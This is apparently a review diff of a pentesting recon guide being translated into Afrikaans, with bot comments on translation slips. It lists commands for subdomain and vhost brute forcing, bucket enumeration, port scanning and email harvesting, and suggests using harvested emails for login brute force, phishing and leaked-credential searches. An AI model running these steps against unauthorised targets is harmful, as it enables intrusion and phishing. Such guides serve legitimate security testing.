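Review bot: the OneForAll link target was changed from `https://github.com/shmilylty/OneForAll/tree/master/docs/en-us` to `.../docs/af-za`. The path is part of the URL, not translatable text; unless that directory actually exists upstream the link will 404, so keep `docs/en-us`. Also the bodies of the `rapiddns()` and `crt()` bash functions (`curl -s ...`, `| grep -oE ...`, `| sort -u`) appear once on each side with identical text, so the only change is indentation; harmless to bash, but a translation commit should not touch whitespace inside fenced code at all (the same change breaks the Python block earlier in this file), so consider re-running the translation with code fences excluded.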
@ -355,42 +307,35 @@ python3 SubDomainizer.py -u https://tesla.com | grep tesla.com
|
|||
# Get only subdomains from subscraper, this already perform recursion over the found results
|
||||
python subscraper.py -u tesla.com | grep tesla.com | cut -d " " -f
|
||||
```
|
||||
|
||||
* [**Shodan**](https://www.shodan.io/)
|
||||
|
||||
```bash
|
||||
# Get info about the domain
|
||||
shodan domain <domain>
|
||||
# Get other pages with links to subdomains
|
||||
shodan search "http.html:help.domain.com"
|
||||
```
|
||||
|
||||
* [**Censys subdomain finder**](https://github.com/christophetd/censys-subdomain-finder)
|
||||
|
||||
* [**Censys subdomein vindprogram**](https://github.com/christophetd/censys-subdomain-finder)
|
||||
```bash
|
||||
export CENSYS_API_ID=...
|
||||
export CENSYS_API_SECRET=...
|
||||
python3 censys-subdomain-finder.py tesla.com
|
||||
```
|
||||
|
||||
* [**DomainTrail.py**](https://github.com/gatete/DomainTrail)
|
||||
|
||||
```bash
|
||||
python3 DomainTrail.py -d example.com
|
||||
```
|
||||
|
||||
* [**securitytrails.com**](https://securitytrails.com/) has a free API to search for subdomains and IP history
|
||||
* [**securitytrails.com**](https://securitytrails.com/) het 'n gratis API om na subdomeine en IP-geskiedenis te soek
|
||||
* [**chaos.projectdiscovery.io**](https://chaos.projectdiscovery.io/#/)
|
||||
|
||||
This project offers for **free all the subdomains related to bug-bounty programs**. You can access this data also using [chaospy](https://github.com/dr-0x0x/chaospy) or even access the scope used by this project [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list)
|
||||
Hierdie projek bied **gratis alle subdomeine wat verband hou met fout-vondsprogramme**. Jy kan ook toegang tot hierdie data verkry deur [chaospy](https://github.com/dr-0x0x/chaospy) te gebruik of selfs toegang te verkry tot die omvang wat deur hierdie projek gebruik word [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list)
|
||||
|
||||
You can find a **comparison** of many of these tools here: [https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off](https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off)
|
||||
Jy kan 'n **vergelyking** van baie van hierdie gereedskap hier vind: [https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off](https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off)
|
||||
|
||||
### **DNS Brute force**
|
||||
|
||||
Let's try to find new **subdomains** brute-forcing DNS servers using possible subdomain names.
|
||||
Laat ons probeer om nuwe **subdomeine** te vind deur DNS-bedieners te dwing met behulp van moontlike subdomeinname.
|
||||
|
||||
For this action you will need some **common subdomains wordlists like**:
|
||||
Vir hierdie aksie sal jy 'n paar **gewone subdomeinwoordlyste soos** nodig hê:
|
||||
|
||||
* [https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056)
|
||||
* [https://wordlists-cdn.assetnote.io/data/manual/best-dns-wordlist.txt](https://wordlists-cdn.assetnote.io/data/manual/best-dns-wordlist.txt)
|
||||
|
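Review bot: `python subscraper.py -u tesla.com | grep tesla.com | cut -d " " -f` is unchanged context, but `cut -f` has no field list and the command fails as written; this is pre-existing, yet since the surrounding lines are being rewritten it is worth fixing in the same pass (e.g. `cut -d " " -f 1`). Also `[**Censys subdomein vindprogram**]` translates a project name; the link text should stay `Censys subdomain finder` so readers can match it to the repository, and the same goes for `fout-vondsprogramme` for bug-bounty programs, a term this file otherwise keeps in English (`Bug bounty wenk`).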
@ -398,118 +343,93 @@ For this action you will need some **common subdomains wordlists like**:
|
|||
* [https://github.com/pentester-io/commonspeak](https://github.com/pentester-io/commonspeak)
|
||||
* [https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS](https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS)
|
||||
|
||||
And also IPs of good DNS resolvers. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them. Or you could use: [https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt](https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt)
|
||||
En ook IP-adresse van goeie DNS-oplossers. Om 'n lys van vertroude DNS-oplossers te genereer, kan jy die oplossers aflaai vanaf [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) en [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) gebruik om hulle te filtreer. Of jy kan gebruik maak van: [https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt](https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt)
|
||||
|
||||
The most recommended tools for DNS brute-force are:
|
||||
|
||||
* [**massdns**](https://github.com/blechschmidt/massdns): This was the first tool that performed an effective DNS brute-force. It's very fast however it's prone to false positives.
|
||||
Die mees aanbevole gereedskap vir DNS-brute force is:
|
||||
|
||||
* [**massdns**](https://github.com/blechschmidt/massdns): Dit was die eerste gereedskap wat 'n doeltreffende DNS-brute force uitgevoer het. Dit is baie vinnig, maar dit is geneig om vals positiewe resultate te gee.
|
||||
```bash
|
||||
sed 's/$/.domain.com/' subdomains.txt > bf-subdomains.txt
|
||||
./massdns -r resolvers.txt -w /tmp/results.txt bf-subdomains.txt
|
||||
grep -E "tesla.com. [0-9]+ IN A .+" /tmp/results.txt
|
||||
```
|
||||
|
||||
* [**gobuster**](https://github.com/OJ/gobuster): This one I think just uses 1 resolver
|
||||
|
||||
* [**gobuster**](https://github.com/OJ/gobuster): Ek dink hierdie een gebruik net 1 oplosser
|
||||
```
|
||||
gobuster dns -d mysite.com -t 50 -w subdomains.txt
|
||||
```
|
||||
|
||||
* [**shuffledns**](https://github.com/projectdiscovery/shuffledns) is a wrapper around `massdns`, written in go, that allows you to enumerate valid subdomains using active bruteforce, as well as resolve subdomains with wildcard handling and easy input-output support.
|
||||
|
||||
* [**shuffledns**](https://github.com/projectdiscovery/shuffledns) is 'n omhulsel rondom `massdns`, geskryf in go, wat jou in staat stel om geldige subdomeine op te som deur middel van aktiewe bruteforce, asook om subdomeine op te los met wildcard hantering en maklike in-uitset ondersteuning.
|
||||
```
|
||||
shuffledns -d example.com -list example-subdomains.txt -r resolvers.txt
|
||||
```
|
||||
|
||||
* [**puredns**](https://github.com/d3mondev/puredns): It also uses `massdns`.
|
||||
|
||||
* [**puredns**](https://github.com/d3mondev/puredns): Dit maak ook gebruik van `massdns`.
|
||||
```
|
||||
puredns bruteforce all.txt domain.com
|
||||
```
|
||||
|
||||
* [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) uses asyncio to brute force domain names asynchronously.
|
||||
|
||||
* [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) gebruik asyncio om domeinname asinkronies te brute force.
|
||||
```
|
||||
aiodnsbrute -r resolvers -w wordlist.txt -vv -t 1024 domain.com
|
||||
```
|
||||
### Tweede DNS Brute-Force Ronde
|
||||
|
||||
### Second DNS Brute-Force Round
|
||||
|
||||
After having found subdomains using open sources and brute-forcing, you could generate alterations of the subdomains found to try to find even more. Several tools are useful for this purpose:
|
||||
|
||||
* [**dnsgen**](https://github.com/ProjectAnte/dnsgen)**:** Given the domains and subdomains generate permutations.
|
||||
Nadat jy subdomeine gevind het deur gebruik te maak van oop bronne en brute-force, kan jy variasies van die gevonde subdomeine genereer om te probeer om selfs meer te vind. Verskeie hulpmiddels is nuttig vir hierdie doel:
|
||||
|
||||
* [**dnsgen**](https://github.com/ProjectAnte/dnsgen)**:** Gee die domeine en subdomeine en genereer permutasies.
|
||||
```bash
|
||||
cat subdomains.txt | dnsgen -
|
||||
```
|
||||
|
||||
* [**goaltdns**](https://github.com/subfinder/goaltdns): Given the domains and subdomains generate permutations.
|
||||
* You can get goaltdns permutations **wordlist** in [**here**](https://github.com/subfinder/goaltdns/blob/master/words.txt).
|
||||
|
||||
* [**goaltdns**](https://github.com/subfinder/goaltdns): Gee die domeine en subdomeine en genereer permutasies.
|
||||
* Jy kan die goaltdns permutasies **woordelys** hier kry [**hier**](https://github.com/subfinder/goaltdns/blob/master/words.txt).
|
||||
```bash
|
||||
goaltdns -l subdomains.txt -w /tmp/words-permutations.txt -o /tmp/final-words-s3.txt
|
||||
```
|
||||
|
||||
* [**gotator**](https://github.com/Josue87/gotator)**:** Given the domains and subdomains generate permutations. If not permutations file is indicated gotator will use its own one.
|
||||
|
||||
* [**gotator**](https://github.com/Josue87/gotator)**:** Gee die domeine en subdomeine en genereer permutasies. As geen permutasie lêer aangedui word nie, sal gotator sy eie een gebruik.
|
||||
```
|
||||
gotator -sub subdomains.txt -silent [-perm /tmp/words-permutations.txt]
|
||||
```
|
||||
|
||||
* [**altdns**](https://github.com/infosec-au/altdns): Apart from generating subdomains permutations, it can also try to resolve them (but it's better to use the previous commented tools).
|
||||
* You can get altdns permutations **wordlist** in [**here**](https://github.com/infosec-au/altdns/blob/master/words.txt).
|
||||
|
||||
* [**altdns**](https://github.com/infosec-au/altdns): Afgesien van die generering van subdomein-permutasies, kan dit ook probeer om hulle op te los (maar dit is beter om die vorige genoemde gereedskap te gebruik).
|
||||
* Jy kan die altdns permutasies **woordelys** hier kry [**hier**](https://github.com/infosec-au/altdns/blob/master/words.txt).
|
||||
```
|
||||
altdns -i subdomains.txt -w /tmp/words-permutations.txt -o /tmp/asd3
|
||||
```
|
||||
|
||||
* [**dmut**](https://github.com/bp0lr/dmut): Another tool to perform permutations, mutations and alteration of subdomains. This tool will brute force the result (it doesn't support dns wild card).
|
||||
* You can get dmut permutations wordlist in [**here**](https://raw.githubusercontent.com/bp0lr/dmut/main/words.txt).
|
||||
|
||||
* [**dmut**](https://github.com/bp0lr/dmut): 'n Ander instrument om permutasies, mutasies en verandering van subdomeine uit te voer. Hierdie instrument sal die resultaat met geweld afdwing (dit ondersteun nie dns-wildkaart nie).
|
||||
* Jy kan die dmut-permutasies-woordelys hier kry [**hier**](https://raw.githubusercontent.com/bp0lr/dmut/main/words.txt).
|
||||
```bash
|
||||
cat subdomains.txt | dmut -d /tmp/words-permutations.txt -w 100 \
|
||||
--dns-errorLimit 10 --use-pb --verbose -s /tmp/resolvers-trusted.txt
|
||||
--dns-errorLimit 10 --use-pb --verbose -s /tmp/resolvers-trusted.txt
|
||||
```
|
||||
* [**alterx**](https://github.com/projectdiscovery/alterx)**:** Gebaseer op 'n domein, **genereer dit nuwe potensiële subdomeinname** gebaseer op aangeduide patrone om meer subdomeine te ontdek.
|
||||
|
||||
* [**alterx**](https://github.com/projectdiscovery/alterx)**:** Based on a domain it **generates new potential subdomains names** based on indicated patterns to try to discover more subdomains.
|
||||
|
||||
#### Smart permutations generation
|
||||
|
||||
* [**regulator**](https://github.com/cramppet/regulator): For more info read this [**post**](https://cramppet.github.io/regulator/index.html) but it will basically get the **main parts** from the **discovered subdomains** and will mix them to find more subdomains.
|
||||
#### Slim permutasie generasie
|
||||
|
||||
* [**regulator**](https://github.com/cramppet/regulator): Vir meer inligting lees hierdie [**pos**](https://cramppet.github.io/regulator/index.html), maar dit sal basies die **hoofdele** van die **ontdekte subdomeine** kry en meng om meer subdomeine te vind.
|
||||
```bash
|
||||
python3 main.py adobe.com adobe adobe.rules
|
||||
make_brute_list.sh adobe.rules adobe.brute
|
||||
puredns resolve adobe.brute --write adobe.valid
|
||||
```
|
||||
|
||||
* [**subzuf**](https://github.com/elceef/subzuf)**:** _subzuf_ is a subdomain brute-force fuzzer coupled with an immensly simple but effective DNS reponse-guided algorithm. It utilizes a provided set of input data, like a tailored wordlist or historical DNS/TLS records, to accurately synthesize more corresponding domain names and expand them even further in a loop based on information gathered during DNS scan.
|
||||
|
||||
* [**subzuf**](https://github.com/elceef/subzuf)**:** _subzuf_ is 'n subdomein brute-force fuzzer wat gekoppel is aan 'n eenvoudige maar effektiewe DNS-respons-geleide algoritme. Dit maak gebruik van 'n voorsiene stel insetdata, soos 'n op maat gemaakte woordelys of historiese DNS/TLS-rekords, om akkuraat meer ooreenstemmende domeinname te sintetiseer en hulle verder uit te brei in 'n lus gebaseer op inligting wat tydens die DNS-scan ingesamel is.
|
||||
```
|
||||
echo www | subzuf facebook.com
|
||||
```
|
||||
### **Subdomein Ontdekkingswerkstroom**
|
||||
|
||||
### **Subdomain Discovery Workflow**
|
||||
|
||||
Check this blog post I wrote about how to **automate the subdomain discovery** from a domain using **Trickest workflows** so I don't need to launch manually a bunch of tools in my computer:
|
||||
Kyk na hierdie blogpos wat ek geskryf het oor hoe om die ontdekking van subdomeine outomaties te maak deur gebruik te maak van Trickest-werkstrome sodat ek nie handmatig 'n klomp gereedskap op my rekenaar hoef te begin nie:
|
||||
|
||||
{% embed url="https://trickest.com/blog/full-subdomain-discovery-using-workflow/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
{% embed url="https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
### **VHosts / Virtual Hosts**
|
||||
### **VHosts / Virtuele Gasheer**
|
||||
|
||||
If you found an IP address containing **one or several web pages** belonging to subdomains, you could try to **find other subdomains with webs in that IP** by looking in **OSINT sources** for domains in an IP or by **brute-forcing VHost domain names in that IP**.
|
||||
As jy 'n IP-adres gevind het wat een of verskeie webbladsye bevat wat aan subdomeine behoort, kan jy probeer om ander subdomeine met webbladsye in daardie IP te vind deur in OSINT-bronne te kyk vir domeine in 'n IP of deur VHost-domeinname in daardie IP te brute force.
|
||||
|
||||
#### OSINT
|
||||
|
||||
You can find some **VHosts in IPs using** [**HostHunter**](https://github.com/SpiderLabs/HostHunter) **or other APIs**.
|
||||
Jy kan sommige VHosts in IP's vind deur gebruik te maak van [HostHunter](https://github.com/SpiderLabs/HostHunter) of ander API's.
|
||||
|
||||
**Brute Force**
|
||||
|
||||
If you suspect that some subdomain can be hidden in a web server you could try to brute force it:
|
||||
|
||||
As jy vermoed dat 'n subdomein dalk weggesteek is op 'n webbediener, kan jy probeer om dit deur brute force te vind:
|
||||
```bash
|
||||
ffuf -c -w /path/to/wordlist -u http://victim.com -H "Host: FUZZ.victim.com"
|
||||
|
||||
|
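Review bot: the translated VHosts paragraph and the OSINT line lost their emphasis markup. `If you found an IP address containing **one or several web pages** ... by **brute-forcing VHost domain names in that IP**` becomes plain text in `As jy 'n IP-adres gevind het wat een of verskeie webbladsye bevat ...`, and `You can find some **VHosts in IPs using** [**HostHunter**](...)` becomes `[HostHunter](...)` without bold; the rest of the file keeps the bold, so restore it for consistency. Also the dmut continuation line `--dns-errorLimit 10 --use-pb --verbose -s /tmp/resolvers-trusted.txt` appears once on each side with identical text, i.e. an indentation-only change inside a code block; harmless here thanks to the trailing backslash on the previous line, but it confirms the translator is rewriting whitespace inside fenced code.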
@ -523,219 +443,211 @@ vhostbrute.py --url="example.com" --remoteip="10.1.1.15" --base="www.example.com
|
|||
#https://github.com/codingo/VHostScan
|
||||
VHostScan -t example.com
|
||||
```
|
||||
|
||||
{% hint style="info" %}
|
||||
With this technique you may even be able to access internal/hidden endpoints.
|
||||
Met hierdie tegniek kan jy selfs toegang kry tot interne/verborge eindpunte.
|
||||
{% endhint %}
|
||||
|
||||
### **CORS Brute Force**
|
||||
|
||||
Sometimes you will find pages that only return the header _**Access-Control-Allow-Origin**_ when a valid domain/subdomain is set in the _**Origin**_ header. In these scenarios, you can abuse this behaviour to **discover** new **subdomains**.
|
||||
|
||||
Soms sal jy bladsye vind wat slegs die _**Access-Control-Allow-Origin**_ kop _teruggee wanneer 'n geldige domein/subdomein in die _**Origin**_ kop ingestel is. In hierdie scenario's kan jy hierdie gedrag misbruik om nuwe **subdomeine** te **ontdek**.
|
||||
```bash
|
||||
ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http://FUZZ.crossfit.htb' -mr "Access-Control-Allow-Origin" -ignore-body
|
||||
```
|
||||
### **Emmers Brute Force**
|
||||
|
||||
### **Buckets Brute Force**
|
||||
Terwyl jy soek na **subdomeine**, hou 'n oog uit om te sien of dit na enige soort **emmer** verwys, en in daardie geval [**kontroleer die toestemmings**](../../network-services-pentesting/pentesting-web/buckets/)**.**\
|
||||
Verder, aangesien jy op hierdie punt al die domeine binne die omvang sal ken, probeer [**brute force moontlike emmernaam en kontroleer die toestemmings**](../../network-services-pentesting/pentesting-web/buckets/).
|
||||
|
||||
While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/)**.**\
|
||||
Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](../../network-services-pentesting/pentesting-web/buckets/).
|
||||
### **Monitorisering**
|
||||
|
||||
### **Monitorization**
|
||||
Jy kan **monitor** of **nuwe subdomeine** van 'n domein geskep word deur die **Sertifikaat Transparancy** Logboeke te monitor [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)doen.
|
||||
|
||||
You can **monitor** if **new subdomains** of a domain are created by monitoring the **Certificate Transparency** Logs [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)does.
|
||||
### **Op soek na kwesbaarhede**
|
||||
|
||||
### **Looking for vulnerabilities**
|
||||
Kyk vir moontlike [**subdomein-oorgawes**](../../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\
|
||||
As die **subdomein** na 'n **S3-emmer** verwys, [**kontroleer die toestemmings**](../../network-services-pentesting/pentesting-web/buckets/).
|
||||
|
||||
Check for possible [**subdomain takeovers**](../../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\
|
||||
If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/).
|
||||
As jy enige **subdomein met 'n ander IP** as diegene wat jy reeds in die batesontdekking gevind het, moet jy 'n **basiese kwesbaarheidsskandering** (met behulp van Nessus of OpenVAS) en 'n paar [**poortskenning**](../pentesting-network/#discovering-hosts-from-the-outside) doen met **nmap/masscan/shodan**. Afhangende van watter dienste loop, kan jy in **hierdie boek 'n paar truuks vind om hulle te "aanval"**.\
|
||||
Merk op dat die subdomein soms gehuisves word binne 'n IP wat nie deur die kliënt beheer word nie, so dit is nie binne die omvang nie, wees versigtig.
|
||||
|
||||
If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
|
||||
_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
|
||||
## IP's
|
||||
|
||||
## IPs
|
||||
In die aanvanklike stappe het jy dalk **sekere IP-reekse, domeine en subdomeine gevind**.\
|
||||
Dit is tyd om al die IP's van daardie reekse te **versamel** en vir die **domeine/subdomeine (DNS-navrae)**.
|
||||
|
||||
In the initial steps you might have **found some IP ranges, domains and subdomains**.\
|
||||
It’s time to **recollect all the IPs from those ranges** and for the **domains/subdomains (DNS queries).**
|
||||
|
||||
Using services from the following **free apis** you can also find **previous IPs used by domains and subdomains**. These IPs might still be owned by the client (and might allow you to find [**CloudFlare bypasses**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md))
|
||||
Deur dienste van die volgende **gratis API's** te gebruik, kan jy ook **vorige IP's wat deur domeine en subdomeine gebruik is**, vind. Hierdie IP's mag steeds deur die kliënt besit word (en mag jou in staat stel om [**CloudFlare-omseilings**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md) te vind)
|
||||
|
||||
* [**https://securitytrails.com/**](https://securitytrails.com/)
|
||||
|
||||
You can also check for domains pointing a specific IP address using the tool [**hakip2host**](https://github.com/hakluke/hakip2host)
|
||||
Jy kan ook vir domeine wat na 'n spesifieke IP-adres verwys, kyk deur die hulpmiddel [**hakip2host**](https://github.com/hakluke/hakip2host) te gebruik.
|
||||
|
||||
### **Looking for vulnerabilities**
|
||||
### **Op soek na kwesbaarhede**
|
||||
|
||||
**Port scan all the IPs that doesn’t belong to CDNs** (as you highly probably won’t find anything interested in there). In the running services discovered you might be **able to find vulnerabilities**.
|
||||
**Poortsken al die IP's wat nie aan CDN's behoort nie** (aangesien jy waarskynlik niks interessants daar sal vind nie). In die ontdekte lopende dienste kan jy **kwesbaarhede vind**.
|
||||
|
||||
**Find a** [**guide**](../pentesting-network/) **about how to scan hosts.**
|
||||
**Vind 'n** [**gids**](../pentesting-network/) **oor hoe om gasheer te skandeer.**
|
||||
|
||||
## Web servers hunting
|
||||
## Soek na webbedieners
|
||||
|
||||
> We have found all the companies and their assets and we know IP ranges, domains and subdomains inside the scope. It's time to search for web servers.
|
||||
> Ons het al die maatskappye en hul bates gevind en ons ken IP-reekse, domeine en subdomeine binne die omvang. Dit is tyd om na webbedieners te soek.
|
||||
|
||||
In the previous steps you have probably already performed some **recon of the IPs and domains discovered**, so you may have **already found all the possible web servers**. However, if you haven't we are now going to see some **fast tricks to search for web servers** inside the scope.
|
||||
In die vorige stappe het jy waarskynlik al 'n bietjie **rekognisering van die ontdekte IP's en domeine** gedoen, so jy het dalk **al die moontlike webbedieners al gevind**. As jy dit egter nie gedoen het nie, gaan ons nou kyk na 'n paar **vinnige truuks om na webbedieners** binne die omvang te soek.
|
||||
|
||||
Please, note that this will be **oriented for web apps discovery**, so you should **perform the vulnerability** and **port scanning** also (**if allowed** by the scope).
|
||||
|
||||
A **fast method** to discover **ports open** related to **web** servers using [**masscan** can be found here](../pentesting-network/#http-port-discovery).\
|
||||
Another friendly tool to look for web servers is [**httprobe**](https://github.com/tomnomnom/httprobe)**,** [**fprobe**](https://github.com/theblackturtle/fprobe) and [**httpx**](https://github.com/projectdiscovery/httpx). You just pass a list of domains and it will try to connect to port 80 (http) and 443 (https). Additionally, you can indicate to try other ports:
|
||||
Let asseblief daarop dat dit **georiënteer sal wees vir die ontdekking van webtoepassings**, so jy moet ook die **kwesbaarheid** en **poortskenning** uitvoer (**as toegelaat** deur die omvang).
|
||||
|
||||
'n **Vinnige metode** om **oop poorte** wat verband hou met **webbedieners** te ontdek deur gebruik te maak van [**masscan** kan hier gevind word](../pentesting-network/#http-port-discovery).\
|
||||
'n Ander vriendelike hulpmiddel om na webbedieners te soek is [**httprobe**](https://github.com/tomnomnom/httprobe)**,** [**fprobe**](https://github.com/theblackturtle/fprobe) en [**httpx**](https://github.com/projectdiscovery/httpx). Jy stuur net 'n lys domeine en dit sal probeer om aan te sluit by poort 80 (http) en 443 (https). Daarbenewens kan jy aandui om ander poorte te probeer:
|
||||
```bash
|
||||
cat /tmp/domains.txt | httprobe #Test all domains inside the file for port 80 and 443
|
||||
cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 and 8080 and 8443
|
||||
```
|
||||
### **Skermfoto's**
|
||||
|
||||
### **Screenshots**
|
||||
Nou dat jy al die webbedieners in die omvang ontdek het (onder die IP-adresse van die maatskappy en al die domeine en subdomeine), weet jy waarskynlik nie waar om te begin nie. So, maak dit eenvoudig en begin net deur skermfoto's van almal te neem. Deur net na die hoofbladsy te kyk, kan jy vreemde eindpunte vind wat meer geneig is om kwesbaar te wees.
|
||||
|
||||
Now that you have discovered **all the web servers** present in the scope (among the **IPs** of the company and all the **domains** and **subdomains**) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just by **taking a look** at the **main page** you can find **weird** endpoints that are more **prone** to be **vulnerable**.
|
||||
Om die voorgestelde idee uit te voer, kan jy [EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness), [HttpScreenshot](https://github.com/breenmachine/httpscreenshot), [Aquatone](https://github.com/michenriksen/aquatone), [Shutter](https://shutter-project.org/downloads/third-party-packages/) of [webscreenshot](https://github.com/maaaaz/webscreenshot) gebruik.
|
||||
|
||||
To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), [**Aquatone**](https://github.com/michenriksen/aquatone), [**Shutter**](https://shutter-project.org/downloads/third-party-packages/) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.**
|
||||
Verder kan jy dan [eyeballer](https://github.com/BishopFox/eyeballer) gebruik om deur al die skermfoto's te loop om jou te vertel wat waarskynlik kwesbaarhede bevat, en wat nie.
|
||||
|
||||
Moreover, you could then use [**eyeballer**](https://github.com/BishopFox/eyeballer) to run over all the **screenshots** to tell you **what's likely to contain vulnerabilities**, and what isn't.
|
||||
## Openbare Cloud Bates
|
||||
|
||||
## Public Cloud Assets
|
||||
Om potensiële cloud bates wat aan 'n maatskappy behoort, te vind, moet jy begin met 'n lys sleutelwoorde wat daardie maatskappy identifiseer. Byvoorbeeld, vir 'n kriptomaatskappy kan jy woorde soos "crypto", "wallet", "dao", "<domain_name>", "<subdomain_names>" gebruik.
|
||||
|
||||
In order to find potential cloud assets belonging to a company you should **start with a list of keywords that identify that company**. For example, a crypto for a crypto company you might use words such as: `"crypto", "wallet", "dao", "<domain_name>", <"subdomain_names">`.
|
||||
|
||||
You will also need wordlists of **common words used in buckets**:
|
||||
Jy sal ook woordlyste van algemene woorde wat in emmers gebruik word, benodig:
|
||||
|
||||
* [https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt](https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt)
|
||||
* [https://raw.githubusercontent.com/infosec-au/altdns/master/words.txt](https://raw.githubusercontent.com/infosec-au/altdns/master/words.txt)
|
||||
* [https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt](https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt)
|
||||
|
||||
Then, with those words you should generate **permutations** (check the [**Second Round DNS Brute-Force**](./#second-dns-bruteforce-round) for more info).
|
||||
Met daardie woorde moet jy dan permutasies genereer (sien die [Tweede Ronde DNS Brute-Force](./#second-dns-bruteforce-round) vir meer inligting).
|
||||
|
||||
With the resulting wordlists you could use tools such as [**cloud\_enum**](https://github.com/initstring/cloud\_enum)**,** [**CloudScraper**](https://github.com/jordanpotti/CloudScraper)**,** [**cloudlist**](https://github.com/projectdiscovery/cloudlist) **or** [**S3Scanner**](https://github.com/sa7mon/S3Scanner)**.**
|
||||
Met die resulterende woordlyste kan jy gereedskap soos [cloud_enum](https://github.com/initstring/cloud_enum), [CloudScraper](https://github.com/jordanpotti/CloudScraper), [cloudlist](https://github.com/projectdiscovery/cloudlist) of [S3Scanner](https://github.com/sa7mon/S3Scanner) gebruik.
|
||||
|
||||
Remember that when looking for Cloud Assets you should l**ook for more than just buckets in AWS**.
|
||||
Onthou dat wanneer jy na Cloud Bates soek, jy na meer as net emmers in AWS moet kyk.
|
||||
|
||||
### **Looking for vulnerabilities**
|
||||
### **Op soek na kwesbaarhede**
|
||||
|
||||
If you find things such as **open buckets or cloud functions exposed** you should **access them** and try to see what they offer you and if you can abuse them.
|
||||
As jy dinge soos oop emmers of blootgestelde cloudfunksies vind, moet jy toegang daartoe verkry en probeer sien wat hulle bied en of jy dit kan misbruik.
|
||||
|
||||
## Emails
|
||||
## E-posse
|
||||
|
||||
With the **domains** and **subdomains** inside the scope you basically have all what you **need to start searching for emails**. These are the **APIs** and **tools** that have worked the best for me to find emails of a company:
|
||||
Met die domeine en subdomeine binne die omvang het jy basies alles wat jy nodig het om na e-posse te soek. Hier is die API's en gereedskap wat die beste vir my gewerk het om e-posse van 'n maatskappy te vind:
|
||||
|
||||
* [**theHarvester**](https://github.com/laramies/theHarvester) - with APIs
|
||||
* API of [**https://hunter.io/**](https://hunter.io/) (free version)
|
||||
* API of [**https://app.snov.io/**](https://app.snov.io/) (free version)
|
||||
* API of [**https://minelead.io/**](https://minelead.io/) (free version)
|
||||
* [theHarvester](https://github.com/laramies/theHarvester) - met API's
|
||||
* API van [https://hunter.io/](https://hunter.io/) (gratis weergawe)
|
||||
* API van [https://app.snov.io/](https://app.snov.io/) (gratis weergawe)
|
||||
* API van [https://minelead.io/](https://minelead.io/) (gratis weergawe)
|
||||
|
||||
### **Looking for vulnerabilities**
|
||||
### **Op soek na kwesbaarhede**
|
||||
|
||||
Emails will come handy later to **brute-force web logins and auth services** (such as SSH). Also, they are needed for **phishings**. Moreover, these APIs will give you even more **info about the person** behind the email, which is useful for the phishing campaign.
|
||||
E-posse sal later handig wees om webaanmeldings en outentiseringsdienste (soos SSH) met brute force aan te val. Hulle is ook nodig vir hengelpraktyke. Verder sal hierdie API's jou selfs meer inligting gee oor die persoon agter die e-pos, wat nuttig is vir die hengelveldtog.
|
||||
|
||||
## Credential Leaks
|
||||
## Kredensialek
|
||||
|
||||
With the **domains,** **subdomains**, and **emails** you can start looking for credentials leaked in the past belonging to those emails:
|
||||
Met die domeine, subdomeine en e-posse kan jy begin soek na kredensiale wat in die verlede uitgelek het en aan daardie e-posse behoort:
|
||||
|
||||
* [https://leak-lookup.com](https://leak-lookup.com/account/login)
|
||||
* [https://www.dehashed.com/](https://www.dehashed.com/)
|
||||
|
||||
### **Looking for vulnerabilities**
|
||||
### **Op soek na kwesbaarhede**
|
||||
|
||||
